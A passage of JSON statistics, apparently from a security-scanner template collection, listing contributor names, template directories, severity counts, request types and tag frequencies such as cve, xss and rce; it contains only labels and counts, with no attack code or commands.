gajbhiye","count":1},{"name":"ipanda","count":1},{"name":"ooooooo_q","count":1},{"name":"alperenkesk","count":1},{"name":"rodnt","count":1},{"name":"toufik airane","count":1},{"name":"absshax","count":1},{"name":"akshansh","count":1},{"name":"micha3lb3n","count":1},{"name":"furkansenan","count":1},{"name":"thevillagehacker","count":1},{"name":"yashanand155","count":1},{"name":"willd96","count":1},{"name":"yavolo","count":1},{"name":"_harleo","count":1},{"name":"flag007","count":1},{"name":"mass0ma","count":1},{"name":"noamrathaus","count":1},{"name":"oscarintherocks","count":1},{"name":"52971","count":1},{"name":"sec_hawk","count":1},{"name":"evolutionsec","count":1},{"name":"b4uh0lz","count":1},{"name":"pratik khalane","count":1},{"name":"andirrahmani1","count":1},{"name":"shifacyclewla","count":1},{"name":"kabirsuda","count":1},{"name":"petruknisme","count":1},{"name":"philippdelteil","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"geraldino2","count":1},{"name":"nerrorsec","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"wabafet","count":1},{"name":"kre80r","count":1},{"name":"divya_mudgal","count":1},{"name":"hakluke","count":1},{"name":"juicypotato1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"alex","count":1},{"name":"blckraven","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_c0wb0y_","count":1},{"name":"yashgoti","count":1},{"name":"whynotke","count":1},{"name":"bjhulst","count":1},{"name":"defr0ggy","count":1},{"name":"sy3omda","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"manuelbua","count":1},{"name":"vzamanillo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rojanrijal","count":1},{"name":"naglinagli","count":1},{"name":"qlkwej","count":1},{"name":"fmunozs","count":1},{"name":"elder tao","count":1},{"name":"makyotox","count":1},{"name":"0xtavian","count":1},{"name":"d0rkerdevil","count":1},{"name":"bolli95","count":1},{"name":"co0nan","count":1},{"name":"un-fmunozs","count":1},{"name":"udyz","count":1},{"name":"sickwell","count":1},{"name":"apt-mirror","count":1},{"name":"its0x08","count":1},{"name":"luci","count":1},{"name":"b0yd","count":1},{"name":"0xteles","count":1},{"name":"becivells","count":1},{"name":"streetofhackerr007","count":1},{"name":"0xrod","count":1},{"name":"j33n1k4","count":1},{"name":"b0rn2r00t","count":1},{"name":"patralos","count":1},{"name":"knassar702","count":1},{"name":"remonsec","count":1},{"name":"izn0u","count":1},{"name":"cookiehanhoan","count":1},{"name":"fopina","count":1},{"name":"mesaglio","count":1},{"name":"ajaysenr","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"push4d","count":1},{"name":"ldionmarcil","count":1},{"name":"xstp","count":1},{"name":"ohlinge","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"soyelmago","count":1},{"name":"elmahdi","count":1},{"name":"retr0","count":1},{"name":"brabbit10","count":1},{"name":"berkdusunur","count":1},{"name":"exploitation","count":1},{"name":"0h1in9e","count":1},{"name":"x6263","count":1},{"name":"tim_koopmans","count":1},{"name":"kareemse1im","count":1},{"name":"mubassirpatel","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"mah3sec_","count":1},{"name":"gboddin","count":1},{"name":"daviey","count":1},{"name":"andysvints","count":1},{"name":"rotemreiss","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pudsec","count":1},{"name":"regala_","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"smaranchand","count":1},{"name":"shreyapohekar","count":1},{"name":"omarkurt","count":1}],"directory":[{"name":"cves","count":739},{"name":"vulnerabilities","count":307},{"name":"exposed-panels","count":250},{"name":"technologies","count":192},{"name":"exposures","count":188},{"name":"misconfiguration","count":136},{"name":"takeovers","count":64},{"name":"default-logins","count":56},{"name":"file","count":46},{"name":"workflows","count":37},{"name":"network","count":33},{"name":"iot","count":25},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":650},{"name":"high","count":560},{"name":"medium","count":456},{"name":"critical","count":276},{"name":"low","count":154}],"types":[{"name":"http","count":1991},{"name":"file","count":46},{"name":"network","count":42},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":804},{"name":"lfi","count":325},{"name":"xss","count":253},{"name":"panel","count":252},{"name":"wordpress","count":241},{"name":"exposure","count":233},{"name":"rce","count":200},{"name":"tech","count":191},{"name":"wp-plugin","count":167},{"name":"cve2020","count":164},{"name":"cve2021","count":139},{"name":"joomla","count":128},{"name":"cve2010","count":108},{"name":"cve2019","count":97},{"name":"config","count":94},{"name":"cve2018","count":86},{"name":"apache","count":70},{"name":"takeover","count":68},{"name":"iot","count":66},{"name":"token","count":65},{"name":"default-login","count":64},{"name":"oob","count":57},{"name":"cve2017","count":50},{"name":"unauth","count":47},{"name":"file","count":46},{"name":"network","count":43},{"name":"ssrf","count":40},{"name":"sqli","count":38},{"name":"","count":37},{"name":"oracle","count":36},{"name":"cve2016","count":36},{"name":"redirect","count":34},{"name":"logs","count":30},{"name":"jira","count":28},{"name":"cve2014","count":27},{"name":"atlassian","count":27},{"name":"listing","count":27},{"name":"cve2015","count":26},{"name":"generic","count":23},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":22},{"name":"router","count":20},{"name":"cisco","count":19},{"name":"aem","count":19},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"springboot","count":18},{"name":"misconfig","count":18},{"name":"cve2012","count":17},{"name":"php","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":14},{"name":"weblogic","count":14},{"name":"struts","count":14},{"name":"login","count":14},{"name":"fuzz","count":14},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"devops","count":13},{"name":"zoho","count":13},{"name":"aws","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"cve2013","count":11},{"name":"wp-theme","count":11},{"name":"xxe","count":10},{"name":"dell","count":10},{"name":"vmware","count":9},{"name":"magento","count":9},{"name":"ftp","count":9},{"name":"intrusive","count":9},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"cnvd","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cve2008","count":8},{"name":"scada","count":8},{"name":"nginx","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"ibm","count":7},{"name":"microsoft","count":7},{"name":"google","count":7},{"name":"backup","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"kubernetes","count":7},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"hp","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"jetty","count":6},{"name":"java","count":5},{"name":"ssti","count":5},{"name":"fileupload","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"deserialization","count":5},{"name":"nodejs","count":5},{"name":"circarlife","count":5},{"name":"tomcat","count":5},{"name":"windows","count":5},{"name":"lucee","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"dedecms","count":5},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"magmi","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"proxy","count":4},{"name":"thinkcmf","count":4},{"name":"symantec","count":4},{"name":"vpn","count":4},{"name":"glpi","count":4},{"name":"git","count":4},{"name":"artifactory","count":4},{"name":"zabbix","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"firmware","count":4},{"name":"fatpipe","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"strapi","count":4},{"name":"wso2","count":4},{"name":"exchange","count":4},{"name":"crlf","count":4},{"name":"resin","count":4},{"name":"symfony","count":4},{"name":"thinkphp","count":4},{"name":"traversal","count":4},{"name":"grafana","count":4},{"name":"hongdian","count":4},{"name":"webserver","count":4},{"name":"telerik","count":3},{"name":"ebs","count":3},{"name":"springcloud","count":3},{"name":"openssh","count":3},{"name":"zhiyuan","count":3},{"name":"lfr","count":3},{"name":"vbulletin","count":3},{"name":"terramaster","count":3},{"name":"azure","count":3},{"name":"opensis","count":3},{"name":"kibana","count":3},{"name":"hoteldruid","count":3},{"name":"prometheus","count":3},{"name":"tikiwiki","count":3},{"name":"caucho","count":3},{"name":"linkerd","count":3},{"name":"microstrategy","count":3},{"name":"cacti","count":3},{"name":"nosqli","count":3},{"name":"backups","count":3},{"name":"kevinlab","count":3},{"name":"itop","count":3},{"name":"bigip","count":3},{"name":"smtp","count":3},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"kafka","count":3},{"name":"mail","count":3},{"name":"npm","count":3},{"name":"jeesns","count":3},{"name":"amazon","count":3},{"name":"druid","count":3},{"name":"slack","count":3},{"name":"httpd","count":3},{"name":"mongodb","count":3},{"name":"fpd","count":3},{"name":"log","count":3},{"name":"cve2007","count":3},{"name":"ssh","count":3},{"name":"ofbiz","count":3},{"name":"nacos","count":3},{"name":"injection","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"jellyfin","count":3},{"name":"fanruan","count":3},{"name":"r-seenet","count":3},{"name":"backdoor","count":3},{"name":"nexus","count":3},{"name":"firebase","count":3},{"name":"seeyon","count":2},{"name":"axis2","count":2},{"name":"wuzhicms","count":2},{"name":"ilo","count":2},{"name":"dos","count":2},{"name":"mida","count":2},{"name":"yapi","count":2},{"name":"sitecore","count":2},{"name":"couchdb","count":2},{"name":"avantfax","count":2},{"name":"middleware","count":2},{"name":"chyrp","count":2},{"name":"natshell","count":2},{"name":"liferay","count":2},{"name":"vrealize","count":2},{"name":"globalprotect","count":2},{"name":"splunk","count":2},{"name":"aruba","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"linux","count":2},{"name":"odoo","count":2},{"name":"geowebserver","count":2},{"name":"chiyu","count":2},{"name":"github","count":2},{"name":"commax","count":2},{"name":"bypass","count":2},{"name":"plesk","count":2},{"name":"prtg","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"tidb","count":2},{"name":"pega","count":2},{"name":"nagios","count":2},{"name":"favicon","count":2},{"name":"jsf","count":2},{"name":"wordfence","count":2},{"name":"guacamole","count":2},{"name":"hostheader-injection","count":2},{"name":"qcubed","count":2},{"name":"waf","count":2},{"name":"keycloak","count":2},{"name":"ecoa","count":2},{"name":"aviatrix","count":2},{"name":"sonarqube","count":2},{"name":"huawei","count":2},{"name":"prestashop","count":2},{"name":"mcafee","count":2},{"name":"hjtcloud","count":2},{"name":"enumeration","count":2},{"name":"phpcollab","count":2},{"name":"glassfish","count":2},{"name":"emerge","count":2},{"name":"payara","count":2},{"name":"webcam","count":2},{"name":"cve2005","count":2},{"name":"getsimple","count":2},{"name":"ucmdb","count":2},{"name":"voipmonitor","count":2},{"name":"grav","count":2},{"name":"bucket","count":2},{"name":"saltstack","count":2},{"name":"status","count":2},{"name":"jeedom","count":2},{"name":"showdoc","count":2},{"name":"smb","count":2},{"name":"sharepoint","count":2},{"name":"dolibarr","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"openfire","count":2},{"name":"trixbox","count":2},{"name":"hashicorp","count":2},{"name":"openvpn","count":2},{"name":"cache","count":2},{"name":"kentico","count":2},{"name":"idrac","count":2},{"name":"leak","count":2},{"name":"minio","count":2},{"name":"fortios","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"totemomail","count":2},{"name":"maian","count":2},{"name":"service","count":2},{"name":"akkadian","count":2},{"name":"kong","count":2},{"name":"hasura","count":2},{"name":"sonicwall","count":2},{"name":"chamilo","count":2},{"name":"upload","count":2},{"name":"adminer","count":2},{"name":"jboss","count":2},{"name":"axis","count":2},{"name":"xxljob","count":2},{"name":"akamai","count":2},{"name":"nextcloud","count":2},{"name":"frp","count":2},{"name":"oauth","count":2},{"name":"bruteforce","count":2},{"name":"shellshock","count":2},{"name":"harbor","count":2},{"name":"rstudio","count":2},{"name":"icewarp","count":2},{"name":"yii","count":2},{"name":"ecology","count":2},{"name":"flir","count":2},{"name":"spark","count":2},{"name":"node","count":2},{"name":"netsweeper","count":2},{"name":"paloalto","count":2},{"name":"storage","count":2},{"name":"horde","count":2},{"name":"vcenter","count":2},{"name":"webadmin","count":1},{"name":"flink","count":1},{"name":"kindeditor","count":1},{"name":"sidekiq","count":1},{"name":"opensns","count":1},{"name":"werkzeug","count":1},{"name":"timeclock","count":1},{"name":"postmessage","count":1},{"name":"razor","count":1},{"name":"argussurveillance","count":1},{"name":"skywalking","count":1},{"name":"karel","count":1},{"name":"kyan","count":1},{"name":"gilacms","count":1},{"name":"zenario","count":1},{"name":"parentlink","count":1},{"name":"rocketchat","count":1},{"name":"mysql","count":1},{"name":"sentry","count":1},{"name":"ghost","count":1},{"name":"opensmtpd","count":1},{"name":"idemia","count":1},{"name":"nsasg","count":1},{"name":"dnssec","count":1},{"name":"jenzabar","count":1},{"name":"nimble","count":1},{"name":"arl","count":1},{"name":"fastcgi","count":1},{"name":"grails","count":1},{"name":"shopxo","count":1},{"name":"rdp","count":1},{"name":"sar2html","count":1},{"name":"etouch","count":1},{"name":"adb","count":1},{"name":"portainer","count":1},{"name":"saltapi","count":1},{"name":"gateone","count":1},{"name":"comodo","count":1},{"name":"cve2006","count":1},{"name":"frontpage","count":1},{"name":"myvuehelp","count":1},{"name":"daybyday","count":1},{"name":"mediumish","count":1},{"name":"swagger","count":1},{"name":"uwsgi","count":1},{"name":"accela","count":1},{"name":"novnc","count":1},{"name":"sangfor","count":1},{"name":"wooyun","count":1},{"name":"xiuno","count":1},{"name":"pihole","count":1},{"name":"wamp","count":1},{"name":"ntopng","count":1},{"name":"gurock","count":1},{"name":"fortilogger","count":1},{"name":"maxsite","count":1},{"name":"vnc","count":1},{"name":"viewpoint","count":1},{"name":"landrayoa","count":1},{"name":"metabase","count":1},{"name":"moinmoin","count":1},{"name":"tongda","count":1},{"name":"acexy","count":1},{"name":"natemail","count":1},{"name":"woocommerce","count":1},{"name":"klog","count":1},{"name":"huijietong","count":1},{"name":"email","count":1},{"name":"solman","count":1},{"name":"lancom","count":1},{"name":"camunda","count":1},{"name":"wiki","count":1},{"name":"beanstalk","count":1},{"name":"weiphp","count":1},{"name":"websvn","count":1},{"name":"phalcon","count":1},{"name":"kubeflow","count":1},{"name":"twitter-server","count":1},{"name":"netgenie","count":1},{"name":"xampp","count":1},{"name":"shopizer","count":1},{"name":"sgp","count":1},{"name":"tieline","count":1},{"name":"spectracom","count":1},{"name":"qdpm","count":1},{"name":"empirecms","count":1},{"name":"jeewms","count":1},{"name":"phpfusion","count":1},{"name":"aspnuke","count":1},{"name":"panos","count":1},{"name":"ssl","count":1},{"name":"mongo","count":1},{"name":"servicedesk","count":1},{"name":"rockethchat","count":1},{"name":"csrfguard","count":1},{"name":"cobub","count":1},{"name":"nifi","count":1},{"name":"netmask","count":1},{"name":"zeroshell","count":1},{"name":"zmanda","count":1},{"name":"varnish","count":1},{"name":"fedora","count":1},{"name":"cgi","count":1},{"name":"okta","count":1},{"name":"soar","count":1},{"name":"dom","count":1},{"name":"cofax","count":1},{"name":"st","count":1},{"name":"spip","count":1},{"name":"zarafa","count":1},{"name":"bolt","count":1},{"name":"nweb2fax","count":1},{"name":"avalanche","count":1},{"name":"embedthis","count":1},{"name":"cockpit","count":1},{"name":"openemr","count":1},{"name":"goahead","count":1},{"name":"chevereto","count":1},{"name":"totaljs","count":1},{"name":"cerebro","count":1},{"name":"triconsole","count":1},{"name":"jsp","count":1},{"name":"gstorage","count":1},{"name":"nedi","count":1},{"name":"lotus","count":1},{"name":"alertmanager","count":1},{"name":"tcexam","count":1},{"name":"resourcespace","count":1},{"name":"zzzcms","count":1},{"name":"smi","count":1},{"name":"checkpoint","count":1},{"name":"beanshell","count":1},{"name":"alerta","count":1},{"name":"motorola","count":1},{"name":"jfrog","count":1},{"name":"springframework","count":1},{"name":"terraform","count":1},{"name":"smartsense","count":1},{"name":"ssltls","count":1},{"name":"solarlog","count":1},{"name":"tapestry","count":1},{"name":"graphite","count":1},{"name":"stem","count":1},{"name":"artica","count":1},{"name":"sophos","count":1},{"name":"openstack","count":1},{"name":"duomicms","count":1},{"name":"ueditor","count":1},{"name":"meraki","count":1},{"name":"pagespeed","count":1},{"name":"perl","count":1},{"name":"synnefo","count":1},{"name":"tjws","count":1},{"name":"pulsesecure","count":1},{"name":"clickhouse","count":1},{"name":"scs","count":1},{"name":"clockwork","count":1},{"name":"shopware","count":1},{"name":"office365","count":1},{"name":"codemeter","count":1},{"name":"fuelcms","count":1},{"name":"zm","count":1},{"name":"owasp","count":1},{"name":"krweb","count":1},{"name":"thinkadmin","count":1},{"name":"blind","count":1},{"name":"circontrol","count":1},{"name":"zyxel","count":1},{"name":"yealink","count":1},{"name":"fortigates","count":1},{"name":"yzmcms","count":1},{"name":"openx","count":1},{"name":"optiLink","count":1},{"name":"rsyncd","count":1},{"name":"darkstat","count":1},{"name":"maccmsv10","count":1},{"name":"simplecrm","count":1},{"name":"mpsec","count":1},{"name":"alibaba","count":1},{"name":"esmtp","count":1},{"name":" default-login","count":1},{"name":"extractor","count":1},{"name":"csod","count":1},{"name":"pacsone","count":1},{"name":"scimono","count":1},{"name":"zte","count":1},{"name":"zend","count":1},{"name":"tensorflow","count":1},{"name":"elasticsearch","count":1},{"name":"concrete","count":1},{"name":"listserv","count":1},{"name":"discord","count":1},{"name":"iceflow","count":1},{"name":"tectuus","count":1},{"name":"dvr","count":1},{"name":"apiman","count":1},{"name":"ganglia","count":1},{"name":"blue-ocean","count":1},{"name":"miscrsoft","count":1},{"name":"rmi","count":1},{"name":"plastic","count":1},{"name":"owa","count":1},{"name":"wildfly","count":1},{"name":"appweb","count":1},{"name":"cloudron","count":1},{"name":"apos","count":1},{"name":"qvisdvr","count":1},{"name":"gitea","count":1},{"name":"fiori","count":1},{"name":"sage","count":1},{"name":"crm","count":1},{"name":"wazuh","count":1},{"name":"clink-office","count":1},{"name":"jitsi","count":1},{"name":"wavemaker","count":1},{"name":"floc","count":1},{"name":"tracer","count":1},{"name":"announcekit","count":1},{"name":"hiawatha","count":1},{"name":"phpinfo","count":1},{"name":"omi","count":1},{"name":"commscope","count":1},{"name":"majordomo2","count":1},{"name":"websphere","count":1},{"name":"magicflow","count":1},{"name":"ns","count":1},{"name":"bookstack","count":1},{"name":"basic-auth","count":1},{"name":"upnp","count":1},{"name":"spf","count":1},{"name":"vsftpd","count":1},{"name":"yachtcontrol","count":1},{"name":"trilithic","count":1},{"name":"sprintful","count":1},{"name":"redhat","count":1},{"name":"dvwa","count":1},{"name":"javamelody","count":1},{"name":"emby","count":1},{"name":"jenkin","count":1},{"name":"heroku","count":1},{"name":"dotnetnuke","count":1},{"name":"rhymix","count":1},{"name":"xdcms","count":1},{"name":"asus","count":1},{"name":"lutron","count":1},{"name":"avtech","count":1},{"name":"k8","count":1},{"name":"wavlink","count":1},{"name":"trane","count":1},{"name":"traefik","count":1},{"name":"tenda","count":1},{"name":"mariadb","count":1},{"name":"tamronos","count":1},{"name":"pyramid","count":1},{"name":"expn","count":1},{"name":"s3","count":1},{"name":"jmx","count":1},{"name":"mrtg","count":1},{"name":"webui","count":1},{"name":"zookeeper","count":1},{"name":"haproxy","count":1},{"name":"dotnet","count":1},{"name":"oidc","count":1},{"name":"logontracer","count":1},{"name":"octoprint","count":1},{"name":"cors","count":1},{"name":"sarg","count":1},{"name":"phpshowtime","count":1},{"name":"wondercms","count":1},{"name":"tileserver","count":1},{"name":"mantisbt","count":1},{"name":"achecker","count":1},{"name":"dompdf","count":1},{"name":"linksys","count":1},{"name":"smartblog","count":1},{"name":"sco","count":1},{"name":"mobileiron","count":1},{"name":"nette","count":1},{"name":"kafdrop","count":1},{"name":"acontent","count":1},{"name":"emc","count":1},{"name":"vscode","count":1},{"name":"spidercontrol","count":1},{"name":"expose","count":1},{"name":"panabit","count":1},{"name":"metinfo","count":1},{"name":"clusterengine","count":1},{"name":"mantis","count":1},{"name":"mara","count":1},{"name":"centos","count":1},{"name":"openerp","count":1},{"name":"phpwiki","count":1},{"name":"ecom","count":1},{"name":"feifeicms","count":1},{"name":"luftguitar","count":1},{"name":"fortiweb","count":1},{"name":"olivetti","count":1},{"name":"rujjie","count":1},{"name":"k8s","count":1},{"name":"exacqvision","count":1},{"name":"labtech","count":1},{"name":"acme","count":1},{"name":"anchorcms","count":1},{"name":"episerver","count":1},{"name":"mirai","count":1},{"name":"kerbynet","count":1},{"name":"octobercms","count":1},{"name":"exposures","count":1},{"name":"dbeaver","count":1},{"name":"addpac","count":1},{"name":"robomongo","count":1},{"name":"cloudinary","count":1},{"name":"plc","count":1},{"name":"zcms","count":1},{"name":"pmb","count":1},{"name":"redis","count":1},{"name":"nuuo","count":1},{"name":"htmli","count":1},{"name":"oscommerce","count":1},{"name":"webmin","count":1},{"name":"starttls","count":1},{"name":"graylog","count":1},{"name":"gitlist","count":1},{"name":"xvr","count":1},{"name":"opm","count":1},{"name":"gotmls","count":1},{"name":"subrion","count":1},{"name":"nomad","count":1},{"name":"vidyo","count":1},{"name":"bigbluebutton","count":1},{"name":"api-manager","count":1},{"name":"imap","count":1},{"name":"domxss","count":1},{"name":"whm","count":1},{"name":"processmaker","count":1},{"name":"default","count":1},{"name":"eg","count":1},{"name":"sourcebans","count":1},{"name":"pgadmin","count":1},{"name":"nuxeo","count":1},{"name":"jnoj","count":1},{"name":"centreon","count":1},{"name":"tensorboard","count":1},{"name":"aura","count":1},{"name":"mailchimp","count":1},{"name":"svn","count":1},{"name":"xmlchart","count":1},{"name":"h3c-imc","count":1},{"name":"woocomernce","count":1},{"name":"visionhub","count":1},{"name":"cherokee","count":1},{"name":"postgres","count":1},{"name":"opentsdb","count":1},{"name":"ems","count":1},{"name":"fastapi","count":1},{"name":"nordex","count":1},{"name":"pippoint","count":1},{"name":"szhe","count":1},{"name":"iptime","count":1},{"name":"hadoop","count":1},{"name":"jquery","count":1},{"name":"cocoon","count":1},{"name":"selea","count":1},{"name":"calendarix","count":1},{"name":"gridx","count":1},{"name":"bullwark","count":1},{"name":"mdb","count":1},{"name":"netdata","count":1},{"name":"shiro","count":1},{"name":"webmodule-ee","count":1},{"name":"phpfastcache","count":1},{"name":"ruby","count":1},{"name":"expressjs","count":1},{"name":"nc2","count":1},{"name":"tpshop","count":1},{"name":"ognl","count":1},{"name":"bazarr","count":1},{"name":"b2evolution","count":1},{"name":"sureline","count":1},{"name":"glowroot","count":1},{"name":"ricoh","count":1},{"name":"azkaban","count":1},{"name":"rmc","count":1},{"name":"wmt","count":1},{"name":"cscart","count":1},{"name":"elascticsearch","count":1},{"name":"interlib","count":1},{"name":"graphql","count":1},{"name":"doh","count":1},{"name":"cyberoam","count":1},{"name":"finereport","count":1},{"name":"myucms","count":1},{"name":"javafaces","count":1},{"name":"fortinet","count":1},{"name":"influxdb","count":1},{"name":"plone","count":1},{"name":"actuator","count":1},{"name":"opencast","count":1},{"name":"fortigate","count":1},{"name":"primetek","count":1},{"name":"landray","count":1},{"name":"vsphere","count":1},{"name":"gogs","count":1},{"name":"lg-nas","count":1},{"name":"pcoip","count":1},{"name":"panasonic","count":1},{"name":"bedita","count":1},{"name":"faraday","count":1},{"name":"jaspersoft","count":1},{"name":"dotclear","count":1},{"name":"monitorix","count":1},{"name":"database","count":1},{"name":"burp","count":1},{"name":"webftp","count":1},{"name":"ilo4","count":1},{"name":"sceditor","count":1},{"name":"node-red-dashboard","count":1},{"name":"redmine","count":1},{"name":"froxlor","count":1},{"name":"lanproxy","count":1},{"name":"eyelock","count":1},{"name":"discourse","count":1},{"name":"javascript","count":1},{"name":"cloudflare","count":1},{"name":"clave","count":1},{"name":"xunchi","count":1},{"name":"sql","count":1},{"name":"ioncube","count":1},{"name":"wifisky","count":1},{"name":"lansweeper","count":1},{"name":"viewlinc","count":1},{"name":"zms","count":1},{"name":"circontrorl","count":1},{"name":"mautic","count":1},{"name":"biometrics","count":1},{"name":"74cms","count":1},{"name":"gloo","count":1},{"name":"eprints","count":1},{"name":"auth","count":1},{"name":"xml","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"openrestry","count":1},{"name":"realteo","count":1},{"name":"salesforce","count":1},{"name":"netrc","count":1},{"name":"svnserve","count":1},{"name":"testrail","count":1},{"name":"wing-ftp","count":1},{"name":"geddy","count":1},{"name":"codeigniter","count":1},{"name":"nexusdb","count":1},{"name":"redwood","count":1},{"name":"ulterius","count":1},{"name":"minimouse","count":1},{"name":"visualtools","count":1},{"name":"clockwatch","count":1},{"name":"craftcms","count":1},{"name":"qsan","count":1},{"name":"tika","count":1},{"name":"plugin","count":1},{"name":"turbocrm","count":1},{"name":"hortonworks","count":1},{"name":"couchbase","count":1},{"name":"bash","count":1},{"name":"blackboard","count":1},{"name":"cse","count":1},{"name":"moin","count":1},{"name":"bitly","count":1},{"name":"diris","count":1},{"name":"timesheet","count":1},{"name":"shoppable","count":1},{"name":"ewebs","count":1},{"name":"seacms","count":1},{"name":"gunicorn","count":1},{"name":"geutebruck","count":1},{"name":"proftpd","count":1},{"name":"sqlite","count":1},{"name":"hiboss","count":1},{"name":"erp-nc","count":1},{"name":"linkedin","count":1},{"name":"elfinder","count":1},{"name":"servicenow","count":1},{"name":"keenetic","count":1},{"name":"livezilla","count":1},{"name":"etherpad","count":1},{"name":"csrf","count":1},{"name":"exponentcms","count":1},{"name":"spring","count":1},{"name":"lotuscms","count":1},{"name":"rabbitmq","count":1},{"name":"memcached","count":1},{"name":"redcap","count":1},{"name":"mongoshake","count":1},{"name":"rubedo","count":1},{"name":"lighttpd","count":1},{"name":"powercreator","count":1},{"name":"drone","count":1},{"name":"tor","count":1},{"name":"shoretel","count":1},{"name":"phpunit","count":1},{"name":"eyou","count":1},{"name":"gsoap","count":1},{"name":"chinaunicom","count":1},{"name":"nps","count":1},{"name":"gespage","count":1},{"name":"ruckus","count":1},{"name":"ambari","count":1},{"name":"glances","count":1},{"name":"setup","count":1},{"name":"oneblog","count":1}],"authors":[{"name":"daffainfo","count":280},{"name":"pikpikcu","count":277},{"name":"dhiyaneshdk","count":268},{"name":"pdteam","count":199},{"name":"geeknik","count":154},{"name":"dwisiswant0","count":131},{"name":"gy741","count":77},{"name":"pussycat0x","count":70},{"name":"princechaddha","count":63},{"name":"madrobot","count":61},{"name":"0x_akoko","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":27},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":14},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":9},{"name":"melbadry9","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"emadshanab","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"meme-lord","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"0x240x23elu","count":7},{"name":"dogasantos","count":7},{"name":"pentest_swissky","count":6},{"name":"puzzlepeaches","count":6},{"name":"logicalhunter","count":6},{"name":"caspergn","count":6},{"name":"__fazal","count":6},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"panch0r3d","count":5},{"name":"joanbono","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"xelkomy","count":4},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"dudez","count":3},{"name":"skeltavik","count":3},{"name":"johnk3r","count":3},{"name":"thomas_from_offensity","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"0w4ys","count":3},{"name":"incogbyte","count":3},{"name":"f1tz","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"unstabl3","count":3},{"name":"tess","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"binaryfigments","count":3},{"name":"mavericknerd","count":3},{"name":"fyoorer","count":3},{"name":"vsh00t","count":3},{"name":"jarijaas","count":3},{"name":"idealphase","count":3},{"name":"emenalf","count":3},{"name":"random-robbie","count":2},{"name":"0xcrypto","count":2},{"name":"mohammedsaneem","count":2},{"name":"0xprial","count":2},{"name":"bp0lr","count":2},{"name":"davidmckennirey","count":2},{"name":"kiblyn11","count":2},{"name":"gal nagli","count":2},{"name":"hetroublemakr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"gevakun","count":2},{"name":"vavkamil","count":2},{"name":"hahwul","count":2},{"name":"bing0o","count":2},{"name":"x1m_martijn","count":2},{"name":"0xelkomy","count":2},{"name":"socketz","count":2},{"name":"dheerajmadhukar","count":2},{"name":"afaq","count":2},{"name":"bernardofsr","count":2},{"name":"bsysop","count":2},{"name":"arcc","count":2},{"name":"johnjhacking","count":2},{"name":"whoever","count":2},{"name":"foulenzer","count":2},{"name":"r3naissance","count":2},{"name":"0xsapra","count":2},{"name":"swissky","count":2},{"name":"mahendra purbia 